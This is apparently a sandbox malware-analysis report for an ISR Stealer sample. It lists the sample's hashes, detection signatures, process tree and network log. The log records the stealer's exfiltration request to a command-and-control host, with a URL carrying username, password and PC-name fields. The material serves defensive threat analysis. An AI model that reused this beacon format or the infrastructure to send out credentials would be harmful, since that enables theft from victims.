Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

56f55f54b3...e1.exe

windows7-x64

10

56f55f54b3...e1.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    45s
  • max time network
    106s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    07/12/2022, 03:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe

  • Size

    236KB

  • MD5

    df648c762a8b97f781a1adf22ce8eda7

  • SHA1

    e828b66f6593f13c2193368123acee983e8aee08

  • SHA256

    56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1

  • SHA512

    59392e21cd6bc65eb89bc96900c3f18e3733ccc48ea26a42926f401c4771a6c8246ca6b605300f223aaf9efb713c030f016e09267470d637a62b7a54c5916279

  • SSDEEP

    6144:m3bdXPx3QdIKCC0ef//uXltKc+LVsz9b8Gl:QQdFeCXuLKcCVsz6Gl

Score
10/10
isrstealerspywarestealertrojanupx

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

    trojanstealerisrstealer
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
    "C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      /scomma "C:\Users\Admin\AppData\Local\Temp\RvAjrxUopk.ini"
      2⤵
        PID:1056

    Network

    • flag-unknown
      DNS
      coafuri123456.comoj.com
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      8.8.8.8:53
      Request
      coafuri123456.comoj.com
      IN A
      Response
      coafuri123456.comoj.com
      IN A
      153.92.0.100
    • flag-unknown
      GET
      http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: coafuri123456.comoj.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Sun, 11 Dec 2022 20:52:41 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-unknown
      DNS
      www.000webhost.com
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.184.120
      www.000webhost.com
      IN A
      104.19.185.120
    • flag-unknown
      GET
      https://www.000webhost.com/migrate?static=true
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      Remote address:
      104.19.184.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 403 Forbidden
      Date: Sun, 11 Dec 2022 20:52:42 GMT
      Content-Type: text/plain; charset=UTF-8
      Content-Length: 16
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Referrer-Policy: same-origin
      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Server: cloudflare
      CF-RAY: 77811b03190bb76a-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • 153.92.0.100:80
      http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      http
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      420 B
       1.1kB
       5
      4

      HTTP Request

      GET http://coafuri123456.comoj.com/wp-admin/images/isr/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=

      HTTP Response

      301
    • 104.19.184.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      954 B
       6.5kB
       10
      9

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true

      HTTP Response

      403
    • 8.8.8.8:53
      coafuri123456.comoj.com
      dns
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      69 B
       85 B
       1
      1

      DNS Request

      coafuri123456.comoj.com

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      56f55f54b308f2d4e9b7363063372503ecb4f775340f0e7efe6b0b159aecb4e1.exe
      64 B
       96 B
       1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.184.120
      104.19.185.120

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RvAjrxUopk.ini
      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

      Download Submit

    • memory/1056-56-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

      Download

    • memory/1056-59-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1056-60-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

      Download

    • memory/1056-61-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

      Download

    • memory/1056-62-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

      Download

    • memory/1056-63-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.